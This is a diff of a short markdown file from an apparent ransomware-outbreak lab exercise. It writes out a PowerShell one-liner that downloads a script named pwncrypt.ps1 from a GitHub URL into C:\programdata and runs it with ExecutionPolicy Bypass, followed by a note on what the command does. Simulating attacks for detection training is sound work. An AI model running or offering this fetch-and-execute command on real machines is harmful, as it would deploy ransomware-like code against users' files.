JordanDanielWest/Zero-Day-Ransomware-PwnCrypt-Outbreak/Zero Day Event Creation.md

 - `Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/joshmadakor1/lognpacific-public/refs/heads/main/cyber-range/entropy-gorilla/pwncrypt.ps1' -OutFile 'C:\programdata\pwncrypt.ps1';cmd /c powershell.exe -ExecutionPolicy Bypass -File C:\programdata\pwncrypt.ps1`

 ## What this script does:
+- Intended for use in controlled environments only.
--This script performs two main actions:
+- This script performs two main actions:

     Downloads a PowerShell script:
     It uses Invoke-WebRequest to retrieve pwncrypt.ps1 from a GitHub URL and saves it to C:\programdata\pwncrypt.ps1.